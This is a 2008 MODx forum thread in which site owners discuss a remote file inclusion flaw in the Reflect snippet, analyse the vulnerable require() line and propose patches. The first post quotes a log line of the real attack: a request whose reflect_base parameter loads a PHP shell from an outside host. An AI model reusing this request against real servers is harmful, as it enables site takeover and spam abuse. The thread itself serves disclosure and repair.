0.9.6.2 security problem with reflect snippets

4 Posts

julien04 Reply #1, 15 years, 5 months ago

Hi,

My 0.9.6.2 Modx site has been hacked with a reflect snippets hack :
http://www.milw0rm.com/exploits/7204

Is this hack know here ?

I’ve seen these GET in my logs :
IP www.mymodxsite.com - [24/Nov/2008:10:15:12 +0100] "POST //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.adultfirstdate.com/forum/spider.txt?? HTTP/1.1" 200 1138 "referer" "Opera/9.62 (X11; Linux i686; U; en) Presto/2.1.1"

He load a php script for testing security and upload others scripts easyly.

Sorry for my bad english speaking.

Julien

1,336 Posts

shamblett Reply #2, 15 years, 5 months ago

I seem to be getting these also on my 0.9.6.1p2 install, from various IP’s but I’m returning either 404’s or 200’s with no output.

Use MODx, or the cat gets it!

4 Posts

julien04 Reply #3, 15 years, 5 months ago

No outpout he can execute php on your serveur.

On my serveur, he use snippet.reflect.php to load a "php shell"
Then he use this script to upload 2 php files (a mailler for spam and another php shell)
then he was spamming .....

107 Posts

Kleist Reply #4, 15 years, 5 months ago

I think a fast fix would be to simply remove the file /assets/snippets/reflect/snippet.reflect.php, It shouldn’t affect your usage of the Reflect snippet.

It contains the code for pasting into a snippet, and is not meant for being run on it’s own.

The reason this hack works it the following two lines:

$reflect_base = isset($reflect_base) ? $modx->config['base_path'].$reflect_base : $modx->config['base_path']."assets/snippets/reflect/";
...SNIP...
require($reflect_base."configs/default.config.php");

Since this file is called directly, $modx is not set, and hence $modx->config[’base_path’] is an empty string, and $reflect_base is just $reflect_base. So whatever file is given as argument is loaded.

MODx snippet-glossary 101:
Ditto = Content Lister -- Wayfinder == Menu Builder -- Jot = Comment Control

107 Posts

Kleist Reply #5, 15 years, 5 months ago

I filed a report to Trac for the Ditto project.

http://mirror3.cvsdude.com/trac/ditto/codebase/ticket/109

MODx snippet-glossary 101:
Ditto = Content Lister -- Wayfinder == Menu Builder -- Jot = Comment Control

327 Posts

ncrossland Reply #6, 15 years, 5 months ago

if I try that, it gives an error:

Warning: require(assets/snippets/reflect/configs/default.config.php) [function.require]: failed to open stream: No such file or directory in /home/XXXXXXXX/public_html/assets/snippets/reflect/snippet.reflect.php on line 60

Fatal error: require() [function.require]: Failed opening required 'assets/snippets/reflect/configs/default.config.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/XXXXXXXX/public_html/assets/snippets/reflect/snippet.reflect.php on line 60

Author: ManagerManager plugin - customise your ModX manager interface

Rckt - web development, Sheffield, UK

107 Posts

Kleist Reply #7, 15 years, 5 months ago

Quote from: ncrossland at Nov 24, 2008, 11:24 AM

if I try that, it gives an error:

You probably have register_globals set to off?

If I analyzed the code correctly, the bug is only present with register_globals=on.

MODx snippet-glossary 101:
Ditto = Content Lister -- Wayfinder == Menu Builder -- Jot = Comment Control

2,542 Posts

heliotrope Reply #8, 15 years, 5 months ago

Hi,

as the snippet is stored in db the file is useless and should be deleted.
I’m currently trying a patch on one of my site that has been attacked.
I’ve added at the beginning of the file

if(empty($modx->config)) die (’you should not be there !’);

This should do the trick

:-)

EDIT: this fix should be tweaked in case of the $modx->config is filled within the hack.

Made with MODx : [url=http://www.copadel.com]copadel, fruits et l

107 Posts

Kleist Reply #9, 15 years, 5 months ago

I think a good way to fix this would be with a define saying whether or not this is called as a snippet.

Another way would be not to put snippet contents up as files (especially with the php-extension).

If the file was distributed as snippet.reflect.php.txt instead, there would be no issue.

MODx snippet-glossary 101:
Ditto = Content Lister -- Wayfinder == Menu Builder -- Jot = Comment Control

24,544 Posts

BobRay Reply #10, 15 years, 5 months ago

Quote from: Kleist at Nov 24, 2008, 12:46 PM

I think a good way to fix this would be with a define saying whether or not this is called as a snippet.

Another way would be not to put snippet contents up as files (especially with the php-extension).

If the file was distributed as snippet.reflect.php.txt instead, there would be no issue.

Another way might be to set a $_SESSION variable somewhere else (e.g. in Ditto) to a hash of a modx config variable and then check for it at the beginning of reflect snippet.

Did I help you? Buy me a beer
Get my Book: MODX:The Official Guide
MODX info for everyone: http://bobsguides.com/modx.html
My MODX Extras
Bob's Guides is now hosted at A2 MODX Hosting